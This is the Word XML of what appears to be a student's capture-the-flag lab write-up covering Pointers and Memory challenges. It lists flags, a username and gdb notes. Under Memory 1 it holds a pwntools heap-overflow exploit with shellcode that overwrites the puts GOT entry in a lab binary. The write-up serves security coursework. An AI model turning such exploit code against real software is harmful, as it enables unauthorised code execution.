      </w:r>
      <w:r w:rsidR="001C3E80">
        <w:t>). After the code “buf[x]=y” is executed, the funcPtr variable is printed and the win function’s address can be seen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B5F2D" w14:textId="26FA033E" w:rsidR="001C3E80" w:rsidRDefault="001C3E80" w:rsidP="001C3E80">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA928D5" wp14:editId="509025E1">
            <wp:extent cx="2266950" cy="4762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266950" cy="476250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="605B34B1" w14:textId="67514EA7" w:rsidR="001C3E80" w:rsidRDefault="001C3E80" w:rsidP="001C3E80">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gdb is then exited and the values of -8 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001C3E80">
        <w:t>134514150</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are given which yields the flag (</w:t>
      </w:r>
      <w:r w:rsidRPr="00761348">
        <w:t>42fcc2231c8d68998bad7e7c510cca6f</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026CEAC0" w14:textId="77777777" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F04092A" w14:textId="10950202" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F7AB542" wp14:editId="61887719">
            <wp:extent cx="5924550" cy="95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924550" cy="952500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C96FFB" w14:textId="37D9D437" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAF0844" w14:textId="67DCDAB6" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBF794C" w14:textId="77777777" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D5AC1E" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401"/>
    <w:p w14:paraId="5E38CC1F" w14:textId="791D5CD8" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Pointers 2 (02-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D6A11" w14:textId="77777777" w:rsidR="00263A32" w:rsidRDefault="00263A32" w:rsidP="00263A32">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AC972" w14:textId="1619AE0E" w:rsidR="00263A32" w:rsidRDefault="00263A32" w:rsidP="00263A32">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00263A32">
        <w:t>b5e08b4453fffb085280ae1b2827b6ac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031EE7E5" w14:textId="77777777" w:rsidR="00263A32" w:rsidRPr="00D44401" w:rsidRDefault="00263A32" w:rsidP="00263A32">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2E89F" w14:textId="77777777" w:rsidR="00263A32" w:rsidRDefault="00263A32" w:rsidP="00263A32">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC03F9" w14:textId="5B0E8B2D" w:rsidR="00D44401" w:rsidRDefault="00263A32" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FE268C" wp14:editId="12082BAD">
            <wp:extent cx="5943600" cy="709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9930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E314891" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Pointers 3 (02-3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9A5BC" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Please connect to the CTF server and solve: Pointers 3 (02-3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64180CF0" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Hint: Read Page 131 (Section 3.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B545C2" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401"/>
    <w:p w14:paraId="0A41CC8A" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Pointers 4 (02-4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950924B" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Please connect to the CTF server and solve: Pointers 4 (02-4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4308F7A6" w14:textId="14807512" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00711A52">
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidR="00711A52" w:rsidRPr="00711A52">
        <w:t>f3d84d569330a987b56d928dbaf17591</w:t>
      </w:r>
      <w:r w:rsidR="00711A52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7B8159" wp14:editId="5DED5A36">
            <wp:extent cx="5943600" cy="18383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943600" cy="1838325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11822E" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Pointers 5 (02-5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC079D" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Please connect to the CTF server and solve: Pointers 5 (02-5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747CD0E6" w14:textId="5A6E3296" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401"/>
    <w:p w14:paraId="35D643B1" w14:textId="77EFA441" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401"/>
    <w:p w14:paraId="3F7D5257" w14:textId="45CCAFD8" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401"/>
    <w:p w14:paraId="5882BBF2" w14:textId="2A7121E2" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401"/>
    <w:p w14:paraId="512DB551" w14:textId="6191B293" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401"/>
    <w:p w14:paraId="2D7C9C8D" w14:textId="208E9D53" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401"/>
    <w:p w14:paraId="2C5AC2A7" w14:textId="6A1AA3C4" w:rsidR="00F6259D" w:rsidRPr="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:ind w:left="3600" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6259D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory 1 (03-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36334D" w14:textId="7CE9F006" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401">
      <w:r>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6259D">
        <w:t>fd720553aed2c56104bfd19970e4c6fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50978F1D" w14:textId="0D73CC1C" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D366AB" wp14:editId="473BD1D5">
            <wp:extent cx="5943600" cy="229806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2298065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5647C6E1" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5911D" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>programPath = "/problems/p03-1_2_1110c08a53141f86c1889e0828d09e30/example414"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBCC42C" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sh = process(programPath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BEC67E" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>output = sh.recvline(timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1A8F0" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>firstAddress = output[18:output.index(",")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234ADEDF" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>changedFirstAddress = p32(int(firstAddress, 16) + 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A54E922" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">puts_got_changed_addr = 0x804d024 -12 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768061D7" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>shellcode = 8*"A"+"\xb8\xd6\x88\x04\x08\xff\xe0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3636608E" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>#698+4 (header) == 702 rounded up to the nearest multiple of 8 == 704; 704-4 = 700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22ED58" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload = shellcode + (700-4-len(shellcode))*"A"+"BBBB"+"\xfc\xff\xff\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F826ED" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload += p32(puts_got_changed_addr)+changedFirstAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFA49C3" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sh.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC7463" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sh.recvuntil("third?\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D39DCCC" w14:textId="77777777" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sh.sendline("Third")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A0565" w14:textId="7FD847FC" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00F6259D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>print(sh.recvall().decode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17827502" w14:textId="57CFAFE4" w:rsidR="00F6259D" w:rsidRDefault="00F6259D" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="559B908C" wp14:editId="44A9E329">
            <wp:extent cx="5943600" cy="74612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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="746125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366F09A" w14:textId="25736CD5" w:rsidR="00D44401" w:rsidRPr="00502434" w:rsidRDefault="00D44401" w:rsidP="00502434">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory 2 (03-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5822FDB2" w14:textId="10D714D0" w:rsidR="00FB51F9" w:rsidRDefault="00FB51F9" w:rsidP="00D44401">
      <w:r>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB51F9">
        <w:t>c22632e2d0ab9e4bb06ac8d62e21f816</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472EC85" w14:textId="08D5F7AC" w:rsidR="00BD2CD8" w:rsidRDefault="00BD2CD8" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC77729" wp14:editId="7B331C0F">
            <wp:extent cx="39433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247650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B2707" w14:textId="6C74C234" w:rsidR="00FB51F9" w:rsidRDefault="00FB51F9" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E8B05F" wp14:editId="10764CF7">
            <wp:extent cx="5943600" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="Picture 1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capture&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="752475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B429F" w14:textId="20479FCF" w:rsidR="00C574F4" w:rsidRDefault="00C574F4" w:rsidP="00D44401"/>
    <w:p w14:paraId="561ED228" w14:textId="58DFC66C" w:rsidR="00C574F4" w:rsidRPr="00502434" w:rsidRDefault="00C574F4" w:rsidP="00C574F4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Memory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00502434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (03-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00502434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA9E10" w14:textId="77777777" w:rsidR="00C574F4" w:rsidRDefault="00C574F4" w:rsidP="00D44401"/>
    <w:sectPr w:rsidR="00C57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0B22" w14:textId="77777777" w:rsidR="003D09E1" w:rsidRDefault="003D09E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22C76D18" w14:textId="77777777" w:rsidR="003D09E1" w:rsidRDefault="003D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9128" w14:textId="77777777" w:rsidR="003D09E1" w:rsidRDefault="003D09E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A6A0A20" w14:textId="77777777" w:rsidR="003D09E1" w:rsidRDefault="003D09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01"/>
    <w:rsid w:val="00017890"/>
    <w:rsid w:val="000872B0"/>
    <w:rsid w:val="00090B43"/>
    <w:rsid w:val="000A65F9"/>
    <w:rsid w:val="0015658D"/>
    <w:rsid w:val="001921EF"/>
    <w:rsid w:val="001C3E80"/>
    <w:rsid w:val="00216D18"/>
    <w:rsid w:val="00263A32"/>
    <w:rsid w:val="002F0655"/>
    <w:rsid w:val="003359E5"/>
    <w:rsid w:val="003577E1"/>
    <w:rsid w:val="003645D2"/>
    <w:rsid w:val="003D09E1"/>
    <w:rsid w:val="003F45CC"/>
    <w:rsid w:val="004A6F04"/>
    <w:rsid w:val="004B60F4"/>
    <w:rsid w:val="00502434"/>
    <w:rsid w:val="005338BB"/>
    <w:rsid w:val="005871F0"/>
    <w:rsid w:val="005972B5"/>
    <w:rsid w:val="00711A52"/>
    <w:rsid w:val="00733874"/>
    <w:rsid w:val="00761348"/>
    <w:rsid w:val="00775DA8"/>
    <w:rsid w:val="00785537"/>
    <w:rsid w:val="009D734B"/>
    <w:rsid w:val="00A522AC"/>
    <w:rsid w:val="00B64345"/>
    <w:rsid w:val="00BD2CD8"/>
    <w:rsid w:val="00C574F4"/>
    <w:rsid w:val="00C93E4D"/>
    <w:rsid w:val="00D44401"/>
    <w:rsid w:val="00DF6379"/>
    <w:rsid w:val="00E40F45"/>
    <w:rsid w:val="00E516E9"/>
    <w:rsid w:val="00EA4956"/>
    <w:rsid w:val="00F6259D"/>
    <w:rsid w:val="00FB51F9"/>
    <w:rsid w:val="00FF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AEF38"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{10BFBBC2-A77C-4B4E-B43C-C9F21DA9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5095</TotalTime>
  <Pages>6</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Nayyar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ravi Nayyar</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-26T22:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-11T14:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>